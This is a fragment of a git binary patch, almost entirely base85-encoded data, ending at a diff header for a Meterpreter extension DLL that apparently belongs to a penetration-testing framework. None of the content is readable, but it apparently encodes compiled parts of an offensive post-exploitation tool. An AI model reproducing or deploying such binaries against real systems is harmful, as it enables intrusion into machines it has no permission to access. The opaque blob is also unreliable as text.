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 U*9`_x!825%@mJ~6fjxBie<3?s-~a#s diff --git a/data/meterpreter/ext_server_extapi.x86.dll b/data/meterpreter/ext_server_extapi.x86.dll index a4eefd75066a3bf72f952974159bd7b5e10ccf37..a98abb10406ab59b018ed6ba006fd8e33593ce4c 100755 GIT binary patch delta 11313 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 